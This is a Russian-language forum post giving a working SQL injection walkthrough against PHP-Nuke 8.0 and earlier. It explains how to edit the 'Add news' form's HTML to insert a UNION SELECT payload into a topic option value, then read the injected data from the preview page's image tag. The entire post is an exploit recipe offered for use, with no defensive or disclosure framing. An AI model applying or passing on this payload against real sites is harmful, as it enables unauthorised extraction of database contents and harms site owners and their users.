Показать сообщение отдельно
Старый 05.07.2010, 00:59   #12
Grey
 
Аватар для Grey
 
Регистрация: 30.06.2010
Сообщений: 38
По умолчанию

php-nuke <= 8.0 (SQL инъекция: Получение данных из БД)

Требуется: мейждик квотс = офф

В меню выбираем Добавить новость (Добавить новость).
Лезим в исходник страницы (html) и находим в нём строку:

Код:
<option  value="1">бла бла бла
Меняем её на такую строку (именно с переходом на новую строку):

Код:
<option  value="-1'
union select 1111,2222#">бла бла бла
Нажимаем "Применить изменения".
Затем заполняем данные на странице и в поле "Тема:" выбираем "бла бла бла". Затем нажимаем кнопку "Просмотр"!!! И смотрим исходник страницы, в нем будет что то вроде этого:

Код:
<img src="images/topics/2222" border="0" align="right" alt="1111" title="1111">
Это и есть вывод инъекции. Данные из первой выводимой колонки фильтруются, так что выводим всё через вторую.
Вот и всё добавлять (отправлять) новость не нужно, только предпросмотр.

2008 © Grey

Последний раз редактировалось Grey; 05.07.2010 в 01:09..
Grey вне форума   Ответить с цитированием